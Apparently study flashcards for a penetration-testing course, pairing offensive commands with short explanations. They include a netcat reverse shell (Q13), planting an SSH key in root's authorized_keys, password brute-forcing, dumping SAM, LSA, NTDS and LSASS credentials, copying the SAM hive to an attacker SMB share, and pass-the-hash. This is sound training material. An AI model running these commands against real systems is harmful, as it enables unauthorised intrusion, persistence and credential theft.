Commands

Question 1

ifconfig/ip a

Answer 1

Show our IP address

Question 2

netstat -rn

Answer 2

Show networks accessible

Question 3

ssh user@10.10.10.10

Answer 3

SSH to a remote server

Question 4

ftp 10.129.42.253

Answer 4

FTP to a remote server

Question 5

nmap -sV -sC 10.129.42.253

Answer 5

Run an nmap script scan

Question 6

nmap –script smb-os-discovery.nse -p445 10.10.10.40

Answer 6

Run the smb os discovery nmap script

Question 7

smbclient -N -L \\10.129.42.253

Answer 7

List SMB shares with no user

Question 8

smbclient \\10.129.42.253\users

Answer 8

Connect to the SMB share “Users”

Question 9

snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

Answer 9

scan SNMP using the ‘public’ community string.

Question 10

onesixtyone -c dict.txt 10.129.42.254

Answer 10

Bruteforce SNMP community string

Question 11

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

Answer 11

Simple directory scan using the common.txt wordlist

Question 12

searchsploit openssh 7.2

Answer 12

search for an openssh 7.2 exploit

Question 13

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Answer 13

Creates an interactive reverse shell

Question 14

python -c ‘import pty; pty.spawn(“/bin/bash”)’
ctrl+z then stty raw -echo then fg then enter twice

Answer 14

How to upgrade a shell into an interactive one using Python

Question 15

ssh-keygen -f key

Answer 15

Generates a new SSH key

Question 16

echo “ssh-rsa AAAAB…SNIP…M= user@host”&raquo_space; /root/.ssh/authorized_keys

Answer 16

Adds a generated key into the authorized keys folder.

Question 17

ssh root@10.10.10.10 -i key

Answer 17

SSH using a key.

Question 18

python3 -m http.server 8000

Answer 18

Start a python HTTP server that files can be pulled down from.

Question 19

scp linenum.sh user@remotehost:/tmp/linenum.sh

Answer 19

Copy a file via SSH

Question 20

wget http://10.10.14.1:8000/linpeas.sh

Answer 20

Pulls down a file from a webserver, in this case linpeas.sh

Question 21

nmap -Pn 10.10.10.10

Answer 21

Disables ICMP Echo Requests

Question 22

crackmapexec winrm <ip> -u user.list -p password.list</ip>

Answer 22

Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.

Question 23

crackmapexec smb <ip> -u "user" -p "password" --shares</ip>

Answer 23

Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials.

Question 24

hydra -L user.list -P password.list <service>://<ip></ip></service>

Answer 24

Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.

Question 25

crackmapexec smb <ip> -u <username> -p <password> --ntds</password></username></ip>

Answer 25

Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network.

Question 26

crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa</password></username></ip>

Answer 26

Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way.

Question 27

crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam</password></username></ip>

Answer 27

Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.

Question 28

evil-winrm -i <ip> -u Administrator -H "<passwordhash>"</passwordhash></ip>

Answer 28

Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack.

Question 29

What are the first 4 characters of EMPTY LANMAN:NTHASH hashes from windows?

Answer 29

aad3b…..:31d6c……

Question 30

move sam.save \10.10.15.16\CompData

Answer 30

From a hacked windows box sends a file to a SMB server waiting on our attack host

Question 31

reg.exe save hklm\sam C:\sam.save

Answer 31

Save the SAM

Question 32

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Answer 32

Starts an SMB server with a share named “CompData” and sends it to documents

Question 33

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Answer 33

Dumps everything from a saved SAM and Security registry (using the SYSTEM key)

Question 34

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Answer 34

Cracks a NT hash with rockyou

Question 35

What three hives shoud you grab on any rooted windows host

Answer 35

SAM, System & Security

Question 36

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Answer 36

Gets a dump of process 672. In this example LSASS

Question 37

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Answer 37

Dumps the passwords from an LSASS dump

Question 38

Whats MSV (lsass)

Answer 38

MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database.

Question 39

whats WDIGEST

Answer 39

WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. Cleartext credentials.

Question 40

What from Kerberos is stored in LSASS

Answer 40

LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.

Question 41

What is DPAPI

Answer 41

The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. INCLUDING CHROME, OUTLOOK etc

Question 42

whats NTDS.DIT

Answer 42

a database that stores Active Directory data, including information about user objects, groups and group membership. Importantly, the file also stores the password hashes for all users in the domain.

Question 43

crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! –ntds

Answer 43

remotely dumps ntds.dit from an admin user.

Question 44

vssadmin CREATE SHADOW /For=C:

Answer 44

Creates a volume shadow copy that can be read without special permission

Question 45

cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Answer 45

Moves a created volume shadow copy NTDS.DIT to somewhere on the normal disk.